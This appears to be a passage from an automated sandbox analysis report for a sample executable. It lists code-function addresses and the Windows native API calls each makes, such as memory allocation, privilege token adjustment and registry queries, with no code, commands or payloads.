                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72649210 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,0_2_72649210
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B2E0 TpSetPoolThreadBasePriority,ZwSetInformationWorkerFactory,TpSetPoolThreadBasePriority,0_2_7264B2E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7270B2E0 ZwQueryVirtualMemory,ZwProtectVirtualMemory,0_2_7270B2E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A2F0 ZwQueryInformationFile,0_2_7268A2F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D2FE RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,0_2_7267D2FE
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726722C3 RtlRunOnceExecuteOnce,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_726722C3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726892CD RtlInitUnicodeString,RtlInitUnicodeString,ZwCreateFile,ZwSetInformationFile,RtlFreeUnicodeString,0_2_726892CD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A2C0 ZwSetEvent,0_2_7268A2C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726DB2C0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap,0_2_726DB2C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A2D0 ZwClose,0_2_7268A2D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727012CA memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727012CA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D12B9 ZwAllocateVirtualMemory,memset,RtlInitializeSid,0_2_726D12B9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726642B0 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,0_2_726642B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A2B0 ZwSetInformationThread,0_2_7268A2B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726442BE RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,0_2_726442BE
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C3284 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,0_2_726C3284
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267328D RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,0_2_7267328D
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72688284 ZwCreateThreadEx,ZwClose,0_2_72688284
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72684290 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,0_2_72684290
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266D36F memcmp,ZwSetInformationThread,RtlDeactivateActivationContextUnsafeFast,RtlSetThreadSubProcessTag,memset,RtlRaiseException,ZwSetInformationThread,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,DbgPrintEx,memset,RtlRaiseException,0_2_7266D36F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D137B ZwRaiseException,ZwTerminateProcess,0_2_726D137B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A370 ZwQueryInformationProcess,0_2_7268A370
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C3371 ZwOpenKeyEx,0_2_726C3371
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72688375 ZwAllocateVirtualMemory,ZwFreeVirtualMemory,0_2_72688375
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701351 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701351
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72718356 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72718356
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268C340 RtlUnhandledExceptionFilter,ZwTerminateProcess,0_2_7268C340
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A340 ZwQueryKey,0_2_7268A340
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72671356 RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,0_2_72671356
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268C350 RtlUnhandledExceptionFilter,ZwTerminateProcess,0_2_7268C350
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A350 ZwQueryValueKey,0_2_7268A350
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72715331 ZwSetEvent,ZwWaitForSingleObject,0_2_72715331
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA32E ZwQueryInformationProcess,ZwMapViewOfSection,ZwClose,0_2_726CA32E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72685322 ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationObject,ZwSetInformationThread,ZwAdjustPrivilegesToken,ZwSetInformationThread,0_2_72685322
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264E328 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,0_2_7264E328
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264C330 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,0_2_7264C330
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A330 ZwQueryDefaultLocale,0_2_7268A330
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72649305 ZwClose,ZwClose,0_2_72649305
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C308 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwUnmapViewOfSection,ZwClose,0_2_7266C308
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266A314 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlInitString,___swprintf_l,RtlInitString,RtlAllocateHeap,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,0_2_7266A314
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A310 ZwEnumerateValueKey,0_2_7268A310
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264D319 memset,ZwIsUILanguageComitted,RtlpGetNameFromLangInfoNode,ZwQueryInstallUILanguage,RtlLCIDToCultureName,RtlFreeHeap,0_2_7264D319
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264F3E0 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,0_2_7264F3E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A3E0 ZwFreeVirtualMemory,0_2_7268A3E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726893F6 RtlAllocateHeap,RtlAllocateHeap,RtlCreateUnicodeString,ZwCreateEvent,ZwCreateEvent,RtlInitializeCriticalSectionEx,RtlQueryPerformanceCounter,RtlAllocateHeap,ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeUnicodeString,RtlFreeHeap,0_2_726893F6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727183D7 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727183D7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A3C0 ZwSetInformationProcess,0_2_7268A3C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727013D8 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727013D8
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726593D0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,0_2_726593D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726503DD RtlInitUnicodeString,ZwQueryValueKey,0_2_726503DD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A3D0 ZwCreateKey,0_2_7268A3D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D3AC RtlFreeHeap,RtlWakeAddressAllNoFence,RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlpUnWaitCriticalSection,ZwSetEvent,0_2_7267D3AC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727043A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,0_2_727043A4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D13B6 ZwCreateEvent,0_2_726D13B6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C3BD RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,0_2_7266C3BD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264A380 RtlCreateMemoryZone,ZwAllocateVirtualMemory,0_2_7264A380
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B390 ZwOpenKeyEx,0_2_7268B390
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701071 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701071
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72650070 RtlReportSilentProcessExit,memset,memset,RtlReportSilentProcessExit,ZwDuplicateObject,memset,memset,ZwWaitForSingleObject,ZwClose,ZwClose,0_2_72650070
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72705053 ZwProtectVirtualMemory,0_2_72705053
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72685040 TpCheckTerminateWorker,TpCheckTerminateWorker,ZwDuplicateObject,ZwQueryInformationThread,ZwQueryInformationThread,ZwClose,DbgPrintEx,memset,RtlRaiseException,TpCheckTerminateWorker,0_2_72685040
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C04A RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,0_2_7266C04A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D6042 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,0_2_726D6042
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72717030 RtlCompressBuffer,memcpy,ZwWriteFile,memcpy,0_2_72717030
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72645020 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,0_2_72645020
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72659001 RtlWow64EnableFsRedirectionEx,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlWow64EnableFsRedirectionEx,0_2_72659001
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268C000 ZwWow64IsProcessorFeaturePresent,0_2_7268C000
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701008 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701008
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726890EA memset,memset,ZwClose,0_2_726890EA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727180F7 ZwAlpcSendWaitReceivePort,RtlFreeHeap,0_2_727180F7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726570E9 RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege,0_2_726570E9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266E0E8 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,0_2_7266E0E8
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726480C0 RtlUnlockMemoryZone,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwUnlockVirtualMemory,0_2_726480C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B0C0 ZwGetCurrentProcessorNumber,0_2_7268B0C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726540CC ZwQueryInformationToken,RtlFindAceByType,RtlFindAceByType,RtlFindAceByType,RtlAllocateHeap,memcpy,memcpy,memcpy,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlCreateSecurityDescriptor,RtlFreeHeap,RtlCreateAcl,RtlAddMandatoryAce,RtlFreeHeap,memcpy,RtlFreeHeap,RtlSidDominates,RtlFindAceByType,RtlCreateAcl,RtlAddProcessTrustLabelAce,RtlFreeHeap,ZwDuplicateToken,ZwAccessCheck,ZwClose,ZwPrivilegeCheck,ZwPrivilegeCheck,RtlFreeHeap,memset,memset,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,0_2_726540CC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267C0D7 RtlImageNtHeaderEx,ZwProtectVirtualMemory,0_2_7267C0D7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA0DE ZwRaiseHardError,0_2_726CA0DE
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726490D0 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,0_2_726490D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727150CC ZwTraceControl,0_2_727150CC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727010CF RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727010CF
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726870AB ZwCancelWaitCompletionPacket,RtlDebugPrintTimes,0_2_726870AB
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B0A0 ZwGetCompleteWnfStateSubscription,0_2_7268B0A0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726770AF RtlInitializeCriticalSectionEx,ZwDelayExecution,0_2_726770AF
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72658080 RtlAcquireSRWLockExclusive,ZwProtectVirtualMemory,ZwProtectVirtualMemory,RtlReleaseSRWLockExclusive,0_2_72658080
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72647090 ZwClose,RtlFreeHeap,RtlFreeHeap,0_2_72647090
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B090 ZwGetCachedSigningLevel,0_2_7268B090
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72648160 RtlUnlockModuleSection,RtlAcquireSRWLockExclusive,ZwUnlockVirtualMemory,RtlFreeHeap,RtlReleaseSRWLockExclusive,0_2_72648160
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264516E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,0_2_7264516E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72715162 ZwClose,RtlWakeAllConditionVariable,0_2_72715162
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D5170 DbgPrompt,ZwWow64DebuggerCall,0_2_726D5170
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701151 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701151
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA146 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel,0_2_726CA146
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72658123 ZwProtectVirtualMemory,LdrControlFlowGuardEnforced,LdrControlFlowGuardEnforced,ZwProtectVirtualMemory,ZwProtectVirtualMemory,0_2_72658123
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266D121 RtlFreeHeap,ZwSetInformationThread,ZwSetInformationThread,ZwSetInformationObject,ZwClose,ZwSetInformationThread,0_2_7266D121
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B120 ZwGetNlsSectionPtr,0_2_7268B120
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D113A ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,0_2_726D113A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B101 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,0_2_7264B101
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D6105 memset,memcpy,ZwTraceEvent,0_2_726D6105
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72677110 memset,RtlRandomEx,RtlRandomEx,ZwQueryInformationProcess,ZwQueryInformationProcess,0_2_72677110
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264411D RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,0_2_7264411D
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726451E0 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,0_2_726451E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A1E0 ZwAccessCheck,0_2_7268A1E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C1F6 ZwCreateFile,ZwCreateFile,0_2_7266C1F6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A1F0 ZwWorkerFactoryWorkerReady,0_2_7268A1F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727011D2 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727011D2
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727151D5 RtlNtStatusToDosError,ZwWaitForSingleObject,ZwClose,0_2_727151D5
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267B1C0 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,0_2_7267B1C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B1C0 ZwIsUILanguageComitted,0_2_7268B1C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727171DC ZwWriteFile,0_2_727171DC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726851C6 ZwOpenKey,ZwQueryValueKey,ZwClose,0_2_726851C6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA1AC ZwCompareSigningLevels,ZwCompareSigningLevels,0_2_726CA1AC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D11AC ZwOpenEvent,ZwWaitForSingleObject,ZwClose,0_2_726D11AC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D1B7 RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlDebugPrintTimes,0_2_7267D1B7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726DE1B3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx,0_2_726DE1B3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B180 ZwInitializeNlsFiles,0_2_7268B180
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C7194 RtlAllocateHeap,memcpy,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,0_2_726C7194
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726F3660 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,0_2_726F3660
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271864B RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271864B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C620 TpCallbackIndependent,ZwSetInformationWorkerFactory,TpCallbackIndependent,0_2_7266C620
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A620 ZwDuplicateToken,0_2_7268A620
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72719623 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72719623
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C660A RtlGetCurrentServiceSessionId,RtlAllocateHeap,memcpy,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,0_2_726C660A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A600 ZwOpenEvent,0_2_7268A600
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A610 ZwAdjustPrivilegesToken,0_2_7268A610
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B61F RtlImageNtHeader,ZwQueryVirtualMemory,0_2_7264B61F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726716E5 RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,0_2_726716E5
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C76FC ZwQueryVirtualMemory,0_2_726C76FC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A6C0 ZwApphelpCacheControl,0_2_7268A6C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726866D0 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,0_2_726866D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726466A4 RtlInitUnicodeString,ZwQueryValueKey,0_2_726466A4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726746A4 RtlRandomEx,ZwQueryInformationProcess,0_2_726746A4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726F66A2 ZwSetInformationVirtualMemory,0_2_726F66A2
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726766B4 ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,0_2_726766B4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726716B3 ZwClose,ZwClose,0_2_726716B3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B6B0 ZwQueryLicenseValue,0_2_7268B6B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727186A9 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727186A9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D16B6 ZwQueryInformationProcess,0_2_726D16B6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B680 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,0_2_7264B680
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1689 ZwQueryInformationProcess,0_2_726D1689
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A680 ZwCreateEvent,0_2_7268A680
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B680 ZwQueryInstallUILanguage,0_2_7268B680
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271469B ZwTraceControl,0_2_7271469B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271969E RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271969E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A690 ZwQueryVolumeInformationFile,0_2_7268A690
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7265669E RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,0_2_7265669E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C3693 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,0_2_726C3693
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267F76C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,0_2_7267F76C
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D76B ZwWaitForAlertByThreadId,0_2_7267D76B
